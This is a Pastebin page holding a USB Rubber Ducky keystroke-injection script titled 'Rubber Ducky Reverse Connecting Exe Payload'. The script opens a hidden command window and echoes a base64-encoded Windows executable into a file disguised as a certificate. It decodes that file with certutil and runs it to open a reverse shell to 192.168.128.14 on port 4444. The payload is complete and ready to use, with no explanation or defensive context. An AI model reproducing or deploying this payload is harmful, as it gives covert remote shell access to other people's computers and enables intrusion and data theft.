API tools faq
paste
Advertisement
illwill

Rubber Ducky Reverse Connecting Exe Payload

illwill
Nov 28th, 2016
285
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.54 KB | None | 0 0
raw download clone embed print report
  1. REM ASM Reverse Shell
  2. DELAY 3000
  3. GUI r
  4. DELAY 100
  5. STRING cmd
  6. ENTER
  7. DELAY 1000
  8. STRING mode con:cols=18 lines=1
  9. ENTER
  10. STRING echo -----BEGIN CERTIFICATE----- > encoded.txt
  11. ENTER
  12. STRING echo TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAADhshgBpdN2UqXTdlKl03ZSK8xlUqvTdlJZ82RSoNN2UlJpY2il03ZSAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUEUAAEwBAwA19TtYAAAAAAAAAADgAA8BCwEFDAAEAAAABgAAAAAAAAAQAAAAEAAAACAAAAAAQAAAEAAAAAIAAAQAAAAAAAAABAAAAAAAAAAAQAAAAAQAAAAAAAACAAAAAAAQAAAQAAAAABAAABAAAAAAAAAQAAAAAAAAAAAAAAAsIAAAPAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAACwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAudGV4dAAAABQDAAAAEAAAAAQAAAAEAAAAAAAAAAAAAAAAAAAgAABgLnJkYXRhAAAsAQAAACAAAAACAAAACAAAAAAAAAAAAAAAAAAAQAAAQC5kYXRhAAAAQAIAAAAwAAAAAgAAAAoAAAAAAAAAAAAAAAAAAEAAAMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>> encoded.txt
  13. ENTER
  14. STRING echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGgGMkAAagHoAAEAAGgGMkAA6EICAABoODJAAGoC6OoAAABoODJAAOgsAgAAaHQwQABoAQEAAOixAAAAagBqAGoAagZqAWoC6JoAAACjAjJAAGbHBWQwQAACAGg4MkAA6LwBAABQ6JQAAABmo2YwQABoBjJAAOh+AAAAi0AMiwCLAKNoMEAAoQIyQACjSDBAAKNMMEAAo1AwQADHBRAwQABEAAAAxwU8MEAAAQEAAGoQaGQwQAD/NQIyQADoMgAAAGhUMEAAaBAwQABqAGoAaEAAAAhqAWoAagBoADBAAGoA6B8AAADD>> encoded.txt
  15. ENTER
  16. STRING echo /yUkIEAA/yUcIEAA/yUYIEAA/yUUIEAA/yUgIEAA/yUIIEAAzMxVi+yBxHz+//9WV+jmAQAAiUX8M8mLdfysPAB0BzwidfdB6/RR0enR4Vg7wXQLX164AwAAAMnCCACLdfyNvTz///+sPAB0CTwJdQKwIKrr8qqNhTz///+L8Iv4rDwAdQLrGzwidQOq6wOq6++sPCB1ArD+PCJ1A6rr4arr76qNhTz///+L8I29fP7//7kAAAAArDwgdPs7TQh0Faw8AHQdPCB1Cqw8IHT7QTwAdA/r5qqsPCB0BzwAdAOq6/SwAKo7TQhzEYt9DLAAqrgCAAAAX17JwggAjYV8/v//i/CLfQysPAB0DTwidPc8/nUCsCCq6+6qi3UMrDwAdQtfXrgEAAAAycIIALgBAAAAX17JwggAzMxVi+xWVzPAi3UIM8kz0ooGRjwCdRKKBvfSRusLLDCNDImNDEiKBkYKwHXxjQQRM8JfXsnCBADMzFWL7IPE9Gr16KMAAACJRfz/dQjoIAAAAIlF9GoAjUX4UP919P91CP91/OiHAAAAi0X4ycIEAMzMi0QkBI1QA1VXvYCAgICLOIPABI2P//7+/vfXI88jzXU5iziDwASNj//+/v731yPPI811Jos4g8AEjY///v7+99cjzyPNdROLOIPABI2P//7+/vfXI88jzXS098GAgAAAdQbB6RCDwALQ4RvCX13CBADM/yUEIEAA/yUMIEAA/yUAIEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>> encoded.txt
  17. ENTER
  18. STRING echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgIQAA/iAAAN4gAAAQIQAAAAAAALogAACwIAAAoiAAAMogAACUIAAAAAAAAHwgAAAAAAAAAAAAANIgAAAUIAAAaCAAAAAAAAAAAAAA8CAAAAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAhAAD+IAAA3iAAABAhAAAAAAAAuiAAALAgAACiIAAAyiAAAJQgAAAAAAAAQQBXU0FTb2NrZXRBAABDAFdTQVN0YXJ0dXAAAFYAY29ubmVjdABaAGdldGhvc3RieW5hbWUAZQBodG9ucwB3czJfMzIuZGxsAABPAENyZWF0ZVByb2Nlc3NBAABrZXJuZWwzMi5kbGwAAOYAR2V0Q29tbWFuZExpbmVBAGoBR2V0U3RkSGFuZGxlAAD3AldyaXRlRmlsZQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>> encoded.txt
  19. ENTER
  20. STRING echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGNtZAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>> encoded.txt
  21. ENTER
  22. STRING echo -----END CERTIFICATE----- >> encoded.txt
  23. ENTER
  24. STRING certutil -decode encoded.txt reverse.exe
  25. ENTER
  26. DELAY 500
  27. STRING reverse.exe 192.168.128.14 4444
  28. ENTER
  29. STRING exit
  30. ENTER
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!